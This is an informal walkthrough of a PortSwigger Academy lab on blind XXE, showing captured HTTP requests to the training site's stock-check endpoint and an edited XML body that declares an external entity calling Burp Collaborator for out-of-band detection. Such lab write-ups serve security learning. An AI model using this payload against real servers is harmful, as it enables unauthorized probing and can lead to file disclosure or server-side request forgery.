This lab has a "Check stock" feature that parses XML input but does not display the result.

You can detect the [blind XXE](https://portswigger.net/web-security/xxe/blind) vulnerability by triggering out-of-band interactions with an external domain.

To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

# Practical
So let's click around like a normal user to test it's functionality, now let's play around with the check stock function. Let's see how it works.
```http
POST /product/stock HTTP/1.1
Host: acb21f1d1eb88240802b041e0044008d.web-security-academy.net
Cookie: session=LDP1BjlHKU0lhV5tyTjMTkloDkXoYKrT
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acb21f1d1eb88240802b041e0044008d.web-security-academy.net/product?productId=2
Content-Type: application/xml
Origin: https://acb21f1d1eb88240802b041e0044008d.web-security-academy.net
Content-Length: 193
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>3</productId><storeId>1</storeId>
</stockCheck>
```
Looks like it's sending XML again. Since we don't have Burp Pro version we can't see the request on http://burpcollaborator.net, so let's just assume we know it's working

Let's edit the request
```http
POST /product/stock HTTP/1.1
Host: acb21f1d1eb88240802b041e0044008d.web-security-academy.net
Cookie: session=LDP1BjlHKU0lhV5tyTjMTkloDkXoYKrT
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acb21f1d1eb88240802b041e0044008d.web-security-academy.net/product?productId=2
Content-Type: application/xml
Origin: https://acb21f1d1eb88240802b041e0044008d.web-security-academy.net
Content-Length: 193
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://burpcollaborator.net/'>]>
<stockCheck><productId>&test;</productId><storeId>1</storeId>
</stockCheck>
```
We'll call test on the productID, and if we'll get an error message
```http
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 15

"Parsing error"
```
But doesn't mean that it didn't work, let's just if we solved the lab or not. Since It's doesn't return any response except a Parsing error.
And we solved the lab.

